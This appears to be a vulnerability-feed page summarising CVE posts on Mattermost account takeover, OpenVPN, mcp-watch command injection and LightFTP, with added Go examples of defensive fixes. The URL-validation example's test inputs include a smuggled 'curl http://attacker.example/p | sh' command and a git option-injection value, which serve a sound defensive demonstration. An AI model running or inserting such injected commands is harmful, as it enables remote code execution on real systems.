Overview
- Avast
- Antivirus
Description
Statistics
- 1 Post
- 7 Interactions
Overview
- Mattermost
- Mattermost
Description
Statistics
- 1 Post
- 4 Interactions
Fediverse
sev:CRIT account takeover in Mattermost.
Mattermost versions 11.0.x <= 11.0.2, 10.12.x <= 10.12.1, 10.11.x <= 10.11.4, 10.5.x <= 10.5.12 fail to verify that the token used during the code exchange originates from the same authentication flow, which allows an authenticated user to perform account takeover via a specially crafted email address used when switching authentication methods and sending a request to the /users/login/sso/code-exchange endpoint. The vulnerability requires ExperimentalEnableAuthenticationTransfer to be enabled (default: enabled) and RequireEmailVerification to be disabled (default: disabled).
Overview
- Ruijie Networks Co., Ltd.
- RG-UAC
Description
Statistics
- 1 Post
- 1 Interaction
Overview
Description
Statistics
- 1 Post
- 5 Interactions
Fediverse
Buffer overread in OpenVPN. See what happens when you enable IPv6?
https://community.openvpn.net/Security%20Announcements/CVE-2025-12106
Overview
- Avast
- Antivirus
Description
Statistics
- 1 Post
- 5 Interactions
Overview
- Mattermost
- Mattermost
Description
Statistics
- 1 Post
- 2 Interactions
Fediverse
Also:
Mattermost versions 11.0.x <= 11.0.2, 10.12.x <= 10.12.1, 10.11.x <= 10.11.4, 10.5.x <= 10.5.12 fail to sanitize team email addresses to be visible only to Team Admins, which allows any authenticated user to view team email addresses via the GET /api/v4/channels/{channel_id}/common_teams endpoint.
Overview
- Mattermost
- Mattermost
Description
Statistics
- 1 Post
- 1 Interaction
Fediverse
And:
Mattermost versions 10.12.x <= 10.12.1, 10.11.x <= 10.11.4, 10.5.x <= 10.5.12, 11.0.x <= 11.0.3 fail to properly validate OAuth state tokens during OpenID Connect authentication which allows an authenticated attacker with team creation or admin privileges to take over any user account via manipulation of authentication data during the OAuth completion flow
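Both Mattermost account-takeover items above (the code-exchange token not verified to come from the same authentication flow, and the OAuth state not properly validated during OIDC completion) come down to one missing check: a one-time token must be bound to the browser session and purpose that created it, and the server must decide which account a completion touches from its own flow record, never from an email or identity supplied in the callback. The Go below is an added illustration of that binding written for this page; it is not Mattermost's code and does not reproduce its endpoints or data model. The type and function names (authFlow, flowStore, the "transfer" purpose) and the session and subject identifiers are constructed assumptions.

```go
package main

import (
	"crypto/rand"
	"crypto/subtle"
	"encoding/base64"
	"errors"
	"fmt"
	"sync"
	"time"
)

// authFlow is the server-side record of one in-progress OAuth/OIDC login or
// authentication-method transfer (hypothetical names, not Mattermost's).
// The state token given to the browser is only an opaque lookup key; the
// facts that decide the outcome live here, not in the callback request.
type authFlow struct {
	sessionID string    // browser session that started the flow
	userID    string    // account being modified ("" for a plain login)
	purpose   string    // "login" or "transfer"
	expiresAt time.Time
}

// flowStore holds pending flows; now is injectable so expiry is testable.
type flowStore struct {
	mu    sync.Mutex
	flows map[string]authFlow
	now   func() time.Time
}

func newFlowStore() *flowStore {
	return &flowStore{flows: map[string]authFlow{}, now: time.Now}
}

// newStateToken returns 256 bits from the CSPRNG, URL-safe encoded.
func newStateToken() (string, error) {
	b := make([]byte, 32)
	if _, err := rand.Read(b); err != nil {
		return "", err
	}
	return base64.RawURLEncoding.EncodeToString(b), nil
}

// Begin starts a flow for the given browser session. For a transfer,
// userID is the account the caller is authenticated as right now.
func (s *flowStore) Begin(sessionID, userID, purpose string, ttl time.Duration) (string, error) {
	if purpose == "transfer" && userID == "" {
		return "", errors.New("transfer requires an authenticated user")
	}
	tok, err := newStateToken()
	if err != nil {
		return "", err
	}
	s.mu.Lock()
	defer s.mu.Unlock()
	s.flows[tok] = authFlow{sessionID: sessionID, userID: userID, purpose: purpose, expiresAt: s.now().Add(ttl)}
	return tok, nil
}

var (
	ErrUnknownState    = errors.New("unknown or already consumed state")
	ErrExpiredState    = errors.New("state expired")
	ErrSessionMismatch = errors.New("state was issued to a different browser session")
	ErrNoAccount       = errors.New("provider identity is not linked to any account")
)

// Complete consumes a state exactly once and returns the account the completion
// applies to. providerSubject is what the IdP asserted (e.g. OIDC "sub"); lookup
// maps it to a local account for logins. For a transfer the target is the account
// recorded at Begin, so a subject or email arriving in the callback cannot steer
// the credential swap onto a different user.
func (s *flowStore) Complete(state, sessionID, providerSubject string, lookup func(string) (string, bool)) (string, error) {
	s.mu.Lock()
	f, ok := s.flows[state]
	delete(s.flows, state) // single use: any presentation burns the token
	s.mu.Unlock()
	if !ok {
		return "", ErrUnknownState
	}
	if s.now().After(f.expiresAt) {
		return "", ErrExpiredState
	}
	if subtle.ConstantTimeCompare([]byte(f.sessionID), []byte(sessionID)) != 1 {
		return "", ErrSessionMismatch
	}
	if f.purpose == "transfer" {
		return f.userID, nil
	}
	if id, found := lookup(providerSubject); found {
		return id, nil
	}
	return "", ErrNoAccount
}

func main() {
	s := newFlowStore()
	lookup := func(sub string) (string, bool) { // constructed account directory
		if sub == "idp-sub-42" {
			return "alice", true
		}
		return "", false
	}
	// alice, in browser session sess-A, starts switching her login to SSO.
	state, _ := s.Begin("sess-A", "alice", "transfer", 5*time.Minute)
	// The callback asserts someone else's identity; the flow record decides.
	fmt.Println(s.Complete(state, "sess-A", "idp-sub-victim", lookup)) // alice <nil>
	fmt.Println(s.Complete(state, "sess-A", "idp-sub-victim", lookup)) // "" unknown or already consumed state
}
```

The store deletes the token before any check runs, so a token presented from the wrong session, or after expiry, cannot be retried; a legitimate user whose attempt fails simply starts a new flow. In a multi-node deployment the same record would live in the shared session store rather than a process-local map.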
Overview
- kapilduraphe
- mcp-watch
Description
Statistics
- 1 Post
- 1 Interaction
Fediverse
🔴 CVE-2025-66401 (CRITICAL, CVSS 9.8): kapilduraphe mcp-watch ≤0.1.2 is vulnerable to OS command injection via unsanitized githubUrl in cloneRepo. Attackers can execute arbitrary commands remotely. Audit, isolate, and monitor now! https://radar.offseq.com/threat/cve-2025-66401-cwe-78-improper-neutralization-of-s-6ace6b6d #OffSeq #Vulnerability #CyberSec
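The mcp-watch post names the pattern (CWE-78: a githubUrl passed unsanitized into a repository clone) but not the code. The Go below is an added example written for this page, not mcp-watch's own code (which is not in Go): it shows the shell-string construction that makes such a bug possible alongside the two controls that close it, a strict allow-list on the URL and an argument vector with `--` so git never interprets the URL as an option. The function names, the path regex and the sample inputs are constructed assumptions.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"regexp"
)

// vulnerableCommandLine shows the anti-pattern behind CWE-78: the caller's
// URL is spliced into a string a shell will parse, so ';', '|' and '$(...)'
// inside the URL become commands. Only builds the string; nothing runs it.
func vulnerableCommandLine(githubURL, dest string) string {
	return fmt.Sprintf("git clone %s %s", githubURL, dest)
}

// repoPath matches exactly "/owner/repo" or "/owner/repo.git".
var repoPath = regexp.MustCompile(`^/[A-Za-z0-9_.-]+/[A-Za-z0-9_.-]+$`)

// validateGitHubURL accepts only an https URL on github.com whose path is
// owner/repo, with no userinfo, port, query or fragment. Anything starting
// with '-' fails the scheme check, which also stops option injection such
// as --upload-pack=<cmd>; metacharacters fail the path check.
func validateGitHubURL(raw string) (string, error) {
	u, err := url.Parse(raw)
	if err != nil {
		return "", err
	}
	switch {
	case u.Scheme != "https":
		return "", errors.New("scheme must be https")
	case u.Host != "github.com":
		return "", errors.New("host must be github.com")
	case u.User != nil:
		return "", errors.New("userinfo not allowed")
	case u.RawQuery != "" || u.Fragment != "":
		return "", errors.New("query and fragment not allowed")
	case !repoPath.MatchString(u.Path):
		return "", errors.New("path must be /owner/repo")
	}
	return u.String(), nil
}

// cloneArgs builds the argv for exec.Command: no shell is involved, and
// "--" ends option parsing so the URL is always a positional argument.
func cloneArgs(validatedURL, dest string) []string {
	return []string{"git", "clone", "--depth", "1", "--", validatedURL, dest}
}

func main() {
	// Constructed inputs: one benign, one shell injection, one option injection.
	for _, in := range []string{
		"https://github.com/kapilduraphe/mcp-watch",
		"https://github.com/x/y; curl http://attacker.example/p | sh",
		"--upload-pack=touch /tmp/pwned",
	} {
		fmt.Printf("shell string: %q\n", vulnerableCommandLine(in, "/tmp/dest"))
		v, err := validateGitHubURL(in)
		if err != nil {
			fmt.Println("  rejected:", err)
			continue
		}
		fmt.Println("  argv:", cloneArgs(v, "/tmp/dest"))
		// exec.Command(args[0], args[1:]...).Run() would perform the clone.
	}
}
```

The argument vector alone would already defeat the `;`/`|` payload, because no shell ever sees the string; the allow-list is what stops the second class of problem, where a URL beginning with `-` or pointing at a non-https transport is handed to git as a flag or an `ext::` helper. Keep both.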
Overview
Description
Statistics
- 1 Post
- 1 Interaction
Fediverse
BoF in LightFTP.
https://shimo.im/docs/9030JMJpv4IM4Nkw/read
A buffer overflow in the g_cfg.MaxUsers component of LightFTP v2.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.